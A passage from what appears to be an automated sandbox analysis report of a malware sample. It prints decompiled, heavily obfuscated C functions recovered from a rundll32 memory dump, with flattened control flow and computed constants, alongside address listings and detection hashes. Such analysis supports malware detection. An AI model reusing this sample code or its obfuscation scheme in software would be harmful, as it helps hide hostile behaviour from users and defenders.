				_v60 = 0x687dd9;
				_t370 = 0xc;
				_v60 = _v60 * 0x1d;
				_v60 = _v60 << 7;
				_v60 = _v60 ^ 0xeb212648;
				_v84 = 0xd09924;
				_v84 = _v84 * 0x7c;
				_v84 = _v84 ^ 0x650614c5;
				_v100 = 0x3804f2;
				_v100 = _v100 | 0x9eb8052c;
				_v100 = _v100 ^ 0x9eb506d7;
				_v92 = 0xf492b0;
				_v92 = _v92 + 0xffffc4ae;
				_v92 = _v92 ^ 0x00fafa5e;
				_v16 = 0xd0e41e;
				_v16 = _v16 * 0x3d;
				_v16 = _v16 >> 0xd;
				_v16 = _v16 >> 0xe;
				_v16 = _v16 ^ 0x000dc1c9;
				_v24 = 0x66d2fe;
				_v24 = _v24 / _t370;
				_v24 = _v24 + 0xffffccd2;
				_v24 = _v24 ^ 0x0a93dd72;
				_v24 = _v24 ^ 0x0a9c564f;
				_v72 = 0xbcf4e;
				_v72 = _v72 >> 7;
				_v72 = _v72 ^ 0x000c8ddf;
				_t364 = _v72;
				_v68 = 0x4616df;
				_v68 = _v68 + 0x9c8e;
				_v68 = _v68 + 0xaaef;
				_v68 = _v68 ^ 0x004c065d;
				while(1) {
					L1:
					_t353 = 0x2e;
					L2:
					while(_t319 != 0x21229d9) {
						if(_t319 == 0x338c922) {
							_v136 = _t317;
							_t319 = 0x9035918;
							continue;
						}
						if(_t319 == 0x5b964d8) {
							__eflags = _v756 & _v44;
							if(__eflags == 0) {
								_t306 = _a16( &_v756,  &_v160);
								asm("sbb ecx, ecx");
								_t324 =  ~_t306 & 0x09c7cc54;
								L9:
								_t319 = _t324 + 0x21229d9;
								while(1) {
									L1:
									_t353 = 0x2e;
									goto L2;
								}
							}
							__eflags = _v712 - _t353;
							if(_v712 != _t353) {
								L19:
								__eflags = _a24;
								if(__eflags != 0) {
									_push(_v104);
									_push(_v116);
									_t312 = E0038DCF7(_v80, 0x3717a0, __eflags);
									_pop(_t327);
									E003747CE(_t317, _v52, _t327, _v40, _v12, _t312,  &_v712, _v36, _v64);
									E00379DCF(_v28, _v20, _v60, _a8,  &_v1276, _a16, _v84, _a24);
									_t310 = E0037A8B0(_v100, _t312, _v92);
									_t374 = _t374 + 0x3c;
									_t353 = 0x2e;
								}
								L18:
								_t319 = 0xbd9f62d;
								continue;
							}
							__eflags = _v710;
							if(__eflags == 0) {
								goto L18;
							}
							__eflags = _v710 - _t353;
							if(_v710 != _t353) {
								goto L19;
							}
							__eflags = _v708;
							if(__eflags != 0) {
								goto L19;
							}
							goto L18;
						}
						if(_t319 == 0x9035918) {
							_push(_v112);
							_push(_v88);
							E0037A918(_t317, __eflags, _v8, _v96, E0038DCF7(_v56, 0x371770, __eflags), _v124,  &_v1796);
							_t374 = _t374 + 0x1c;
							_t310 = E0037A8B0(_v120, _t307, _v32);
							_t319 = 0xb066d4a;
							while(1) {
								L1:
								_t353 = 0x2e;
								goto L2;
							}
						}
						if(_t319 == 0xb066d4a) {
							_t310 = E00377E00(_v108,  &_v756, _v76, _v48,  &_v1796);
							_t364 = _t310;
							_t374 = _t374 + 0xc;
							__eflags = _t310 - 0xffffffff;
							if(__eflags == 0) {
								L25:
								return _t310;
							}
							_t319 = 0x5b964d8;
							goto L1;
						}
						if(_t319 != 0xbd9f62d) {
							L24:
							__eflags = _t319 - 0xa89df2;
							if(__eflags != 0) {
								continue;
							}
							goto L25;
						}
						_t310 = E00374635(_v16,  &_v756, _t364, _v24);
						asm("sbb ecx, ecx");
						_t324 =  ~_t310 & 0x03a73aff;
						goto L9;
					}
					E00378ABF(_t364, _v72, _v68);
					_t319 = 0xa89df2;
					_t353 = 0x2e;
					goto L24;
				}
			}


























































                                                                                                                                                            0x00379dd9
                                                                                                                                                            0x00379dde
                                                                                                                                                            0x00379de1
                                                                                                                                                            0x00379de4
                                                                                                                                                            0x00379de7
                                                                                                                                                            0x00379de8
                                                                                                                                                            0x00379deb
                                                                                                                                                            0x00379dee
                                                                                                                                                            0x00379def
                                                                                                                                                            0x00379df0
                                                                                                                                                            0x00379df5
                                                                                                                                                            0x00379dfc
                                                                                                                                                            0x00379dff
                                                                                                                                                            0x00379e08
                                                                                                                                                            0x00379e0f
                                                                                                                                                            0x00379e14
                                                                                                                                                            0x00379e1b
                                                                                                                                                            0x00379e22
                                                                                                                                                            0x00379e25
                                                                                                                                                            0x00379e2c
                                                                                                                                                            0x00379e33
                                                                                                                                                            0x00379e3f
                                                                                                                                                            0x00379e44
                                                                                                                                                            0x00379e49
                                                                                                                                                            0x00379e50
                                                                                                                                                            0x00379e57
                                                                                                                                                            0x00379e5e
                                                                                                                                                            0x00379e65
                                                                                                                                                            0x00379e70
                                                                                                                                                            0x00379e71
                                                                                                                                                            0x00379e74
                                                                                                                                                            0x00379e7f
                                                                                                                                                            0x00379e82
                                                                                                                                                            0x00379e89
                                                                                                                                                            0x00379e90
                                                                                                                                                            0x00379e97
                                                                                                                                                            0x00379e9e
                                                                                                                                                            0x00379ea9
                                                                                                                                                            0x00379eac
                                                                                                                                                            0x00379eb3
                                                                                                                                                            0x00379eba
                                                                                                                                                            0x00379ebe
                                                                                                                                                            0x00379ec5
                                                                                                                                                            0x00379ed1
                                                                                                                                                            0x00379ed8
                                                                                                                                                            0x00379edb
                                                                                                                                                            0x00379ee2
                                                                                                                                                            0x00379ee9
                                                                                                                                                            0x00379ef0
                                                                                                                                                            0x00379ef7
                                                                                                                                                            0x00379efe
                                                                                                                                                            0x00379f02
                                                                                                                                                            0x00379f09
                                                                                                                                                            0x00379f10
                                                                                                                                                            0x00379f17
                                                                                                                                                            0x00379f1e
                                                                                                                                                            0x00379f25
                                                                                                                                                            0x00379f2c
                                                                                                                                                            0x00379f33
                                                                                                                                                            0x00379f3a
                                                                                                                                                            0x00379f41
                                                                                                                                                            0x00379f48
                                                                                                                                                            0x00379f4f
                                                                                                                                                            0x00379f56
                                                                                                                                                            0x00379f5d
                                                                                                                                                            0x00379f64
                                                                                                                                                            0x00379f6b
                                                                                                                                                            0x00379f71
                                                                                                                                                            0x00379f78
                                                                                                                                                            0x00379f7f
                                                                                                                                                            0x00379f86
                                                                                                                                                            0x00379f92
                                                                                                                                                            0x00379f97
                                                                                                                                                            0x00379f9c
                                                                                                                                                            0x00379fa3
                                                                                                                                                            0x00379faa
                                                                                                                                                            0x00379fb1
                                                                                                                                                            0x00379fbc
                                                                                                                                                            0x00379fbf
                                                                                                                                                            0x00379fc2
                                                                                                                                                            0x00379fc9
                                                                                                                                                            0x00379fd0
                                                                                                                                                            0x00379fde
                                                                                                                                                            0x00379fe1
                                                                                                                                                            0x00379fe8
                                                                                                                                                            0x00379fef
                                                                                                                                                            0x00379ffa
                                                                                                                                                            0x00379ffd
                                                                                                                                                            0x0037a000
                                                                                                                                                            0x0037a007
                                                                                                                                                            0x0037a00e
                                                                                                                                                            0x0037a012
                                                                                                                                                            0x0037a019
                                                                                                                                                            0x0037a01c
                                                                                                                                                            0x0037a023
                                                                                                                                                            0x0037a02e
                                                                                                                                                            0x0037a038
                                                                                                                                                            0x0037a03b
                                                                                                                                                            0x0037a03f
                                                                                                                                                            0x0037a046
                                                                                                                                                            0x0037a051
                                                                                                                                                            0x0037a052
                                                                                                                                                            0x0037a055
                                                                                                                                                            0x0037a059
                                                                                                                                                            0x0037a060
                                                                                                                                                            0x0037a06b
                                                                                                                                                            0x0037a06e
                                                                                                                                                            0x0037a075
                                                                                                                                                            0x0037a07c
                                                                                                                                                            0x0037a083
                                                                                                                                                            0x0037a08a
                                                                                                                                                            0x0037a091
                                                                                                                                                            0x0037a098
                                                                                                                                                            0x0037a09f
                                                                                                                                                            0x0037a0aa
                                                                                                                                                            0x0037a0ad
                                                                                                                                                            0x0037a0b1
                                                                                                                                                            0x0037a0b5
                                                                                                                                                            0x0037a0bc
                                                                                                                                                            0x0037a0c8
                                                                                                                                                            0x0037a0cb
                                                                                                                                                            0x0037a0d2
                                                                                                                                                            0x0037a0d9
                                                                                                                                                            0x0037a0e0
                                                                                                                                                            0x0037a0e7
                                                                                                                                                            0x0037a0eb
                                                                                                                                                            0x0037a0f2
                                                                                                                                                            0x0037a0f5
                                                                                                                                                            0x0037a0fc
                                                                                                                                                            0x0037a103
                                                                                                                                                            0x0037a10a
                                                                                                                                                            0x0037a111
                                                                                                                                                            0x0037a111
                                                                                                                                                            0x0037a113
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037a114
                                                                                                                                                            0x0037a126
                                                                                                                                                            0x0037a2d3
                                                                                                                                                            0x0037a2d9
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037a2d9
                                                                                                                                                            0x0037a132
                                                                                                                                                            0x0037a1fa
                                                                                                                                                            0x0037a200
                                                                                                                                                            0x0037a2bf
                                                                                                                                                            0x0037a2c6
                                                                                                                                                            0x0037a2c8
                                                                                                                                                            0x0037a174
                                                                                                                                                            0x0037a174
                                                                                                                                                            0x0037a111
                                                                                                                                                            0x0037a111
                                                                                                                                                            0x0037a113
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037a113
                                                                                                                                                            0x0037a111
                                                                                                                                                            0x0037a206
                                                                                                                                                            0x0037a20d
                                                                                                                                                            0x0037a236
                                                                                                                                                            0x0037a236
                                                                                                                                                            0x0037a23a
                                                                                                                                                            0x0037a23c
                                                                                                                                                            0x0037a244
                                                                                                                                                            0x0037a24a
                                                                                                                                                            0x0037a250
                                                                                                                                                            0x0037a273
                                                                                                                                                            0x0037a294
                                                                                                                                                            0x0037a2a1
                                                                                                                                                            0x0037a2a6
                                                                                                                                                            0x0037a2ab
                                                                                                                                                            0x0037a2ab
                                                                                                                                                            0x0037a22c
                                                                                                                                                            0x0037a22c
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037a22c
                                                                                                                                                            0x0037a20f
                                                                                                                                                            0x0037a217
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037a219
                                                                                                                                                            0x0037a220
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037a222
                                                                                                                                                            0x0037a22a
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037a22a
                                                                                                                                                            0x0037a13e
                                                                                                                                                            0x0037a1af
                                                                                                                                                            0x0037a1b7
                                                                                                                                                            0x0037a1d7
                                                                                                                                                            0x0037a1dc
                                                                                                                                                            0x0037a1e7
                                                                                                                                                            0x0037a1ed
                                                                                                                                                            0x0037a111
                                                                                                                                                            0x0037a111
                                                                                                                                                            0x0037a113
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037a113
                                                                                                                                                            0x0037a111
                                                                                                                                                            0x0037a146
                                                                                                                                                            0x0037a192
                                                                                                                                                            0x0037a197
                                                                                                                                                            0x0037a199
                                                                                                                                                            0x0037a19c
                                                                                                                                                            0x0037a19f
                                                                                                                                                            0x0037a30b
                                                                                                                                                            0x0037a30b
                                                                                                                                                            0x0037a30b
                                                                                                                                                            0x0037a1a5
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037a1a5
                                                                                                                                                            0x0037a14e
                                                                                                                                                            0x0037a2f9
                                                                                                                                                            0x0037a2f9
                                                                                                                                                            0x0037a2ff
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037a2ff
                                                                                                                                                            0x0037a161
                                                                                                                                                            0x0037a16c
                                                                                                                                                            0x0037a16e
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037a16e
                                                                                                                                                            0x0037a2eb
                                                                                                                                                            0x0037a2f3
                                                                                                                                                            0x0037a2f8
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037a2f8

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: H&!$Up7$yBd&
                                                                                                                                                            • API String ID: 0-2352930472
                                                                                                                                                            • Opcode ID: 1982d09ff5004077b963bd30ea95bcffdb7e7e6f399166db91c84b4f0c6b43cc
                                                                                                                                                            • Instruction ID: 02eeb0917df3af0dacc96e306855b8bae45254fe60e297c70bd24e8a30974566
                                                                                                                                                            • Opcode Fuzzy Hash: 1982d09ff5004077b963bd30ea95bcffdb7e7e6f399166db91c84b4f0c6b43cc
                                                                                                                                                            • Instruction Fuzzy Hash: 99E185B1D0021DDBDF29DFE4D98A8EEBBB1FB44314F208159E51ABA260D7B80A45CF41
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 003895FA Relevance: 4.0, Strings: 3, Instructions: 282COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                            			E003895FA() {
				char _v524;
				signed int _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				char _v564;
				intOrPtr _v568;
				char _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				signed int _v688;
				intOrPtr _t295;
				void* _t297;
				void* _t298;
				intOrPtr _t299;
				signed int _t306;
				void* _t309;
				void* _t310;
				char _t311;
				void* _t317;
				intOrPtr _t334;
				signed int _t341;
				signed int _t342;
				signed int _t343;
				signed int _t344;
				void* _t347;

				_v668 = 0xe6fb93;
				_v668 = _v668 + 0xffff1eed;
				_t310 = 0xada6804;
				_v668 = _v668 * 0x61;
				_t309 = 0;
				_v668 = _v668 ^ 0xaca28cc6;
				_v668 = _v668 ^ 0xfb928647;
				_v616 = 0x8caf33;
				_t341 = 0x42;
				_v616 = _v616 * 0x25;
				_v616 = _v616 * 0x4f;
				_v616 = _v616 ^ 0x46546a51;
				_v620 = 0x861136;
				_v620 = _v620 | 0x52f06d4d;
				_v620 = _v620 >> 0xf;
				_v620 = _v620 ^ 0x0000a5ef;
				_v628 = 0x4cf396;
				_v628 = _v628 >> 1;
				_v628 = _v628 >> 9;
				_v628 = _v628 ^ 0x0000133c;
				_v684 = 0xc54e58;
				_v684 = _v684 >> 2;
				_v684 = _v684 ^ 0xb8bf25ee;
				_v684 = _v684 >> 2;
				_v684 = _v684 ^ 0x2e259ad3;
				_v592 = 0x68267f;
				_v592 = _v592 + 0xffff39c4;
				_v592 = _v592 ^ 0x006c60f9;
				_v632 = 0xa1d089;
				_v632 = _v632 / _t341;
				_v632 = _v632 ^ 0x52222b14;
				_v632 = _v632 ^ 0x5220bcfc;
				_v608 = 0x39d352;
				_v608 = _v608 | 0x2e7e1ae1;
				_v608 = _v608 ^ 0x576cc274;
				_v608 = _v608 ^ 0x7911cf35;
				_v660 = 0xc26f36;
				_v660 = _v660 ^ 0x9f5dc88a;
				_v660 = _v660 ^ 0xeefda613;
				_t342 = 0x3f;
				_v660 = _v660 / _t342;
				_v660 = _v660 ^ 0x01ce77bb;
				_v624 = 0x334861;
				_v624 = _v624 + 0xffff4b1a;
				_t343 = 0x2a;
				_v624 = _v624 * 0x2f;
				_v624 = _v624 ^ 0x0947e580;
				_v652 = 0xab72b9;
				_v652 = _v652 << 8;
				_v652 = _v652 / _t343;
				_v652 = _v652 ^ 0x0419701b;
				_v688 = 0x507748;
				_v688 = _v688 << 5;
				_v688 = _v688 + 0xffff449a;
				_v688 = _v688 + 0xb858;
				_v688 = _v688 ^ 0x0a0a66f0;
				_v600 = 0x95cabc;
				_v600 = _v600 + 0xffffb185;
				_v600 = _v600 << 9;
				_v600 = _v600 ^ 0x2af43595;
				_v580 = 0x7e3ec7;
				_v580 = _v580 ^ 0x09caac24;
				_v580 = _v580 ^ 0x09b70662;
				_v612 = 0xa526a8;
				_v612 = _v612 | 0x64dab874;
				_v612 = _v612 >> 0xe;
				_v612 = _v612 ^ 0x0006f9eb;
				_v604 = 0xb7de18;
				_t344 = 0x48;
				_v604 = _v604 * 0x79;
				_v604 = _v604 * 0x31;
				_v604 = _v604 ^ 0xa26ee4e9;
				_v640 = 0x553c00;
				_v640 = _v640 + 0xffff4196;
				_v640 = _v640 + 0xffff8daf;
				_v640 = _v640 ^ 0x00577a07;
				_v576 = 0xaac37;
				_v576 = _v576 * 0x77;
				_v576 = _v576 ^ 0x04fc3a71;
				_v676 = 0xb6ce7b;
				_v676 = _v676 >> 1;
				_v676 = _v676 * 0x28;
				_v676 = _v676 >> 0xb;
				_v676 = _v676 ^ 0x000b20b4;
				_v584 = 0x4877b4;
				_v584 = _v584 << 1;
				_v584 = _v584 ^ 0x009148e9;
				_v588 = 0xaf1c90;
				_v588 = _v588 * 0x5b;
				_v588 = _v588 ^ 0x3e3937c6;
				_v644 = 0x150bb3;
				_v644 = _v644 + 0x865c;
				_v644 = _v644 + 0x5404;
				_v644 = _v644 ^ 0x001dce65;
				_v648 = 0xaa3958;
				_v648 = _v648 / _t344;
				_v648 = _v648 >> 0xe;
				_v648 = _v648 ^ 0x000a9525;
				_v596 = 0xdb2add;
				_v596 = _v596 << 0xd;
				_v596 = _v596 ^ 0x65528fd4;
				_v680 = 0xd04d0c;
				_v680 = _v680 << 5;
				_t340 = _v596;
				_v680 = _v680 * 0x55;
				_v680 = _v680 | 0x96843ebb;
				_v680 = _v680 ^ 0xb7be4a39;
				_v656 = 0x2591b4;
				_v656 = _v656 ^ 0x7517a4f1;
				_v656 = _v656 ^ 0xb20365ef;
				_v656 = _v656 + 0xffff4c4f;
				_v656 = _v656 ^ 0xc733773b;
				_v636 = 0xbfc674;
				_v636 = _v636 * 0x1d;
				_v636 = _v636 << 6;
				_v636 = _v636 ^ 0x6e5b8cbc;
				_v664 = 0x3235cc;
				_v664 = _v664 << 1;
				_v664 = _v664 | 0x857b9d7f;
				_v664 = _v664 * 0x28;
				_v664 = _v664 ^ 0xdbf98c50;
				_v672 = 0xb181ad;
				_v672 = _v672 >> 0xa;
				_v672 = _v672 << 2;
				_v672 = _v672 ^ 0xdb7e6d02;
				_v672 = _v672 ^ 0xdb78e9e9;
				do {
					while(_t310 != 0x10c1a7f) {
						if(_t310 == 0x31db0c0) {
							_t311 = _v572;
							_t295 = _v568;
							_push(_t311);
							_v560 = _t295;
							_v552 = _t295;
							_v544 = _t295;
							_v536 = _t295;
							_v564 = _t311;
							_v556 = _t311;
							_v548 = _t311;
							_v540 = _t311;
							_v532 = _v628;
							_t297 = E00375DDD( &_v564, _t340, _v644, _v648, _t311, _v596, _v680);
							_t347 = _t347 + 0x18;
							__eflags = _t297;
							_t309 =  !=  ? 1 : _t309;
							_t310 = 0x48f7cbb;
							continue;
						} else {
							if(_t310 == 0x461819e) {
								_push(_v660);
								_push(_v608);
								_t298 = E0038DCF7(_v632, 0x371000, __eflags);
								_pop(_t317);
								_t299 =  *0x393e10; // 0x0
								_t334 =  *0x393e10; // 0x0
								E003747CE(_t334 + 0x23c, _v624, _t317, _v652, _v688, _t298, _t299 + 0x1c, _v600, _v580);
								E0037A8B0(_v612, _t298, _v604);
								_t347 = _t347 + 0x24;
								_t310 = 0xa22489e;
								continue;
							} else {
								if(_t310 == 0x48f7cbb) {
									E00381E67(_v656, _v636, _v664, _v672, _t340);
								} else {
									if(_t310 == 0xa22489e) {
										_t306 = E00378F65(_v640, _v576,  &_v524, _v676, 0, _t310, _v616, _v584, _v620, _v588, _t310, _v668);
										_t340 = _t306;
										_t347 = _t347 + 0x28;
										__eflags = _t306 - 0xffffffff;
										if(__eflags != 0) {
											_t310 = 0x31db0c0;
											continue;
										}
									} else {
										if(_t310 == 0xada6804) {
											_t310 = 0xcbcd90e;
											continue;
										} else {
											if(_t310 != 0xcbcd90e) {
												goto L15;
											} else {
												E0038C1EC(_v684, _v592,  &_v572);
												_t310 = 0x10c1a7f;
												continue;
											}
										}
									}
								}
							}
						}
						L18:
						return _t309;
					}
					_v572 = _v572 - E0038ABD1();
					_t310 = 0x461819e;
					asm("sbb [esp+0x8c], edx");
					L15:
					__eflags = _t310 - 0x7e6efe8;
				} while (__eflags != 0);
				goto L18;
			}



























































                                                                                                                                                            0x00389600
                                                                                                                                                            0x0038960a
                                                                                                                                                            0x00389612
                                                                                                                                                            0x00389620
                                                                                                                                                            0x00389624
                                                                                                                                                            0x00389626
                                                                                                                                                            0x0038962e
                                                                                                                                                            0x00389636
                                                                                                                                                            0x00389645
                                                                                                                                                            0x00389648
                                                                                                                                                            0x00389651
                                                                                                                                                            0x00389655
                                                                                                                                                            0x0038965d
                                                                                                                                                            0x00389665
                                                                                                                                                            0x0038966d
                                                                                                                                                            0x00389672
                                                                                                                                                            0x0038967a
                                                                                                                                                            0x00389682
                                                                                                                                                            0x00389686
                                                                                                                                                            0x0038968b
                                                                                                                                                            0x00389693
                                                                                                                                                            0x0038969b
                                                                                                                                                            0x003896a0
                                                                                                                                                            0x003896a8
                                                                                                                                                            0x003896ad
                                                                                                                                                            0x003896b5
                                                                                                                                                            0x003896bd
                                                                                                                                                            0x003896c5
                                                                                                                                                            0x003896cd
                                                                                                                                                            0x003896dd
                                                                                                                                                            0x003896e1
                                                                                                                                                            0x003896e9
                                                                                                                                                            0x003896f1
                                                                                                                                                            0x003896f9
                                                                                                                                                            0x00389701
                                                                                                                                                            0x00389709
                                                                                                                                                            0x00389711
                                                                                                                                                            0x00389719
                                                                                                                                                            0x00389721
                                                                                                                                                            0x0038972d
                                                                                                                                                            0x00389732
                                                                                                                                                            0x00389738
                                                                                                                                                            0x00389740
                                                                                                                                                            0x00389748
                                                                                                                                                            0x00389755
                                                                                                                                                            0x00389756
                                                                                                                                                            0x0038975a
                                                                                                                                                            0x00389762
                                                                                                                                                            0x0038976a
                                                                                                                                                            0x00389775
                                                                                                                                                            0x00389779
                                                                                                                                                            0x00389781
                                                                                                                                                            0x00389789
                                                                                                                                                            0x0038978e
                                                                                                                                                            0x00389796
                                                                                                                                                            0x0038979e
                                                                                                                                                            0x003897a6
                                                                                                                                                            0x003897ae
                                                                                                                                                            0x003897b6
                                                                                                                                                            0x003897bb
                                                                                                                                                            0x003897c3
                                                                                                                                                            0x003897ce
                                                                                                                                                            0x003897db
                                                                                                                                                            0x003897eb
                                                                                                                                                            0x003897f3
                                                                                                                                                            0x003897fb
                                                                                                                                                            0x00389800
                                                                                                                                                            0x00389808
                                                                                                                                                            0x00389817
                                                                                                                                                            0x00389818
                                                                                                                                                            0x00389821
                                                                                                                                                            0x00389825
                                                                                                                                                            0x0038982d
                                                                                                                                                            0x00389835
                                                                                                                                                            0x0038983d
                                                                                                                                                            0x00389845
                                                                                                                                                            0x0038984d
                                                                                                                                                            0x00389860
                                                                                                                                                            0x00389867
                                                                                                                                                            0x00389872
                                                                                                                                                            0x0038987a
                                                                                                                                                            0x00389883
                                                                                                                                                            0x00389887
                                                                                                                                                            0x0038988c
                                                                                                                                                            0x00389894
                                                                                                                                                            0x0038989c
                                                                                                                                                            0x003898a0
                                                                                                                                                            0x003898a8
                                                                                                                                                            0x003898b5
                                                                                                                                                            0x003898b9
                                                                                                                                                            0x003898c1
                                                                                                                                                            0x003898c9
                                                                                                                                                            0x003898d1
                                                                                                                                                            0x003898d9
                                                                                                                                                            0x003898e1
                                                                                                                                                            0x003898ef
                                                                                                                                                            0x003898f3
                                                                                                                                                            0x003898f8
                                                                                                                                                            0x00389900
                                                                                                                                                            0x00389908
                                                                                                                                                            0x0038990d
                                                                                                                                                            0x00389915
                                                                                                                                                            0x0038991d
                                                                                                                                                            0x00389927
                                                                                                                                                            0x0038992b
                                                                                                                                                            0x0038992f
                                                                                                                                                            0x00389937
                                                                                                                                                            0x0038993f
                                                                                                                                                            0x00389947
                                                                                                                                                            0x0038994f
                                                                                                                                                            0x00389957
                                                                                                                                                            0x0038995f
                                                                                                                                                            0x00389967
                                                                                                                                                            0x00389974
                                                                                                                                                            0x00389978
                                                                                                                                                            0x0038997d
                                                                                                                                                            0x00389985
                                                                                                                                                            0x0038998d
                                                                                                                                                            0x00389991
                                                                                                                                                            0x0038999e
                                                                                                                                                            0x003899a2
                                                                                                                                                            0x003899aa
                                                                                                                                                            0x003899b2
                                                                                                                                                            0x003899b7
                                                                                                                                                            0x003899bc
                                                                                                                                                            0x003899c4
                                                                                                                                                            0x003899cc
                                                                                                                                                            0x003899cc
                                                                                                                                                            0x003899da
                                                                                                                                                            0x00389afd
                                                                                                                                                            0x00389b06
                                                                                                                                                            0x00389b0d
                                                                                                                                                            0x00389b0e
                                                                                                                                                            0x00389b15
                                                                                                                                                            0x00389b1c
                                                                                                                                                            0x00389b23
                                                                                                                                                            0x00389b32
                                                                                                                                                            0x00389b3d
                                                                                                                                                            0x00389b49
                                                                                                                                                            0x00389b54
                                                                                                                                                            0x00389b62
                                                                                                                                                            0x00389b69
                                                                                                                                                            0x00389b70
                                                                                                                                                            0x00389b74
                                                                                                                                                            0x00389b76
                                                                                                                                                            0x00389b79
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003899e0
                                                                                                                                                            0x003899e6
                                                                                                                                                            0x00389a87
                                                                                                                                                            0x00389a90
                                                                                                                                                            0x00389a98
                                                                                                                                                            0x00389a9e
                                                                                                                                                            0x00389aac
                                                                                                                                                            0x00389ac3
                                                                                                                                                            0x00389ad6
                                                                                                                                                            0x00389aeb
                                                                                                                                                            0x00389af0
                                                                                                                                                            0x00389af3
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003899ec
                                                                                                                                                            0x003899f2
                                                                                                                                                            0x00389bba
                                                                                                                                                            0x003899f8
                                                                                                                                                            0x003899fe
                                                                                                                                                            0x00389a6d
                                                                                                                                                            0x00389a72
                                                                                                                                                            0x00389a74
                                                                                                                                                            0x00389a77
                                                                                                                                                            0x00389a7a
                                                                                                                                                            0x00389a80
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00389a80
                                                                                                                                                            0x00389a00
                                                                                                                                                            0x00389a06
                                                                                                                                                            0x00389a31
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00389a08
                                                                                                                                                            0x00389a0e
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00389a14
                                                                                                                                                            0x00389a24
                                                                                                                                                            0x00389a2a
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00389a2a
                                                                                                                                                            0x00389a0e
                                                                                                                                                            0x00389a06
                                                                                                                                                            0x003899fe
                                                                                                                                                            0x003899f2
                                                                                                                                                            0x003899e6
                                                                                                                                                            0x00389bc5
                                                                                                                                                            0x00389bce
                                                                                                                                                            0x00389bce
                                                                                                                                                            0x00389b88
                                                                                                                                                            0x00389b8f
                                                                                                                                                            0x00389b94
                                                                                                                                                            0x00389b9b
                                                                                                                                                            0x00389b9b
                                                                                                                                                            0x00389b9b
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: HwP$QjTF$aH3
                                                                                                                                                            • API String ID: 0-3950587752
                                                                                                                                                            • Opcode ID: 5eb9cf9e83c2ab0051b1dd1c5aa16a4083fc16ca6d4a5686a6790ffc6f588a01
                                                                                                                                                            • Instruction ID: 02f467d4d23e4da8b618d741899a997c3cff180fca8e55f8eb3b92d7f7dcb2bf
                                                                                                                                                            • Opcode Fuzzy Hash: 5eb9cf9e83c2ab0051b1dd1c5aa16a4083fc16ca6d4a5686a6790ffc6f588a01
                                                                                                                                                            • Instruction Fuzzy Hash: 66E11F714093819FD369DF25C58A61BBBF1FBC4748F208A1EF29A86260D7B58949CF43
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 0037B2C7 Relevance: 4.0, Strings: 3, Instructions: 235COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                            			E0037B2C7(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v40;
				char _v48;
				intOrPtr _v72;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v92;
				char _v108;
				char _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				void* _t137;
